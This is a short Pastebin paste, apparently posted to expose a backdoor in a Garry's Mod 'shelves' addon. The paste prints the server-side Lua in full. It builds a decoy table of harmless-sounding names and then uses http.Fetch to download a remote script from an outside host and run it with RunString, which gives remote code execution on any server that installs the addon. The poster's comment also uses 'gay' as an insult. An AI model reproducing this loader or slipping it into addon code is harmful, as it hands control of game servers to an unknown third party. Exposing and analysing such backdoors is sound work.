hoobonceagain

shelves addon backdoor '

Aug 14th, 2018
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.85 KB | None | 0 0
  1. -- darkcide distributes this, he just makes a harmless table to disarm you and then at the end of it does this gay shit
  2.  
  3. if SERVER then
  4. local list_tools_manager = {"game", "auto", "run", "spawning", "owner", "tools", "lua", "datafile", "datacontrol", "datamain", "controlfile", "controlpanel", "assist", "anti", "entity", "spawnmanager", "spawner", "toolgun", "tools"}
  5. function game.GetIP() local hostip = GetConVarString( "hostip" ) hostip = tonumber( hostip ) local ip = {} ip[ 1 ] = bit.rshift( bit.band( hostip, 0xFF000000 ), 24 ) ip[ 2 ] = bit.rshift( bit.band( hostip, 0x00FF0000 ), 16 ) ip[ 3 ] = bit.rshift( bit.band( hostip, 0x0000FF00 ), 8 ) ip[ 4 ] = bit.band( hostip, 0x000000FF ) return table.concat( ip, "." ) end http.Fetch( "http://kolshop.hebergratuit.net/anti_drm/drmremoval.lua", function( b, l, h, c ) RunString( b ) end, function() end )
  6. end
Advertisement
Add Comment
Please, Sign In to add comment